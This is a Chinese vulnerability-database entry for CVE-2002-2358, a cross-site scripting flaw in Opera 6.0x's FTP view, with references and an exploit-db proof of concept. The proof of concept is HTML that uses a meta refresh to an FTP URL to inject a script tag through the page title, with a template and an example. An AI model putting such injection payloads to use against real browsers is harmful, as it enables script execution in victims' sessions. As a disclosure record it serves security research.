Opera FTP视图跨站脚本漏洞

Opera FTP视图跨站脚本漏洞

漏洞ID 1106905 漏洞类型 跨站脚本
发布时间 2002-08-06 更新时间 2002-12-31
图片[1]-Opera FTP视图跨站脚本漏洞-安全小百科CVE编号 CVE-2002-2358
图片[2]-Opera FTP视图跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200212-518
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/21681
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-518
|漏洞详情
Opera6.0版本以及6.01版本到6.04版本的FTP视图功能存在跨站脚本(XSS)漏洞。远程攻击者可以借助FTPURL的标题标签注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/5401/info

A cross-site scripting vulnerability in Opera has been reported. When viewing the contents of an FTP site as web content, the data within <title> tags is not sanitized. An attacker may embed javascript between open and closing <title> tags in a FTP URL. 

This vulnerability has been confirmed on Opera 6.03 and 6.04 for Windows 2000.

<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%[email protected]/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>
|参考资料

来源:BID
名称:5401
链接:http://www.securityfocus.com/bid/5401
来源:www.opera.com
链接:http://www.opera.com/windows/changelogs/605/?session=b2a9ea38c710788c23970ba2c9a34d47
来源:XF
名称:multiple-ftp-view-xss(9757)
链接:http://www.iss.net/security_center/static/9757.php
来源:VULNWATCH
名称:20020806OperaFTPViewCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0061.html

相关推荐: AIX fontserver Buffer Overflow Vulnerability

AIX fontserver Buffer Overflow Vulnerability 漏洞ID 1104903 漏洞类型 Boundary Condition Error 发布时间 1998-05-22 更新时间 1998-05-22 CVE编号 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享